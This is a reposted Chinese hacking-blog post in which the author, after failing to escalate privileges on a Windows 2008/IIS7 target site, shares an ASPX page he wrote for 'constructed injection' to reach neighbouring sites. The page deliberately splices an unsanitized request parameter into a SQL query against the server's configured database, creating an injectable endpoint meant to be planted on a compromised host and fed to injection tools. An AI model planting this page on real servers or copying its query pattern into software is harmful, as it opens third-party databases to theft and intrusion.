来源:自学PHP网 时间:2015-04-17 11:59 作者: 阅读:次
[导读] 昨天跟4z1看一个站点,提权很难提,看了整整5个小时,无果。 2008+iis7,无sa,无root,无各种服务。。。其实中用到了aspx构造注射来跨站,网上找了一堆代码,没一个能用的。代码量不...
|
昨天跟4z1看一个站点,提权很难提,看了整整5个小时,无果。 2008+iis7,无sa,无root,无各种服务。。。
其实中用到了aspx构造注射来跨站,网上找了一堆代码,没一个能用的。
代码量不多,自己写个拉倒了。烦死了。
作者:xxser www.anying.org 转载必须注明作者和网址
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
<title>暗影aspx构造注射专用页面</title>
</head>
<body>
<form id="form1" runat="server">
<div>
<script language="c#" runat="server">
void page_init(object sender, EventArgs e)
{
System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();
conn.Open();
string i = this.Page.Request.Params["xxser"]; //这里是参数?xxser=1
System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
int x = command.ExecuteNonQuery();
Response.Write(i+"\n");
Response.Write(x);
conn.Close();
}
</script>
</div>
</form>
</body>
</html>
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
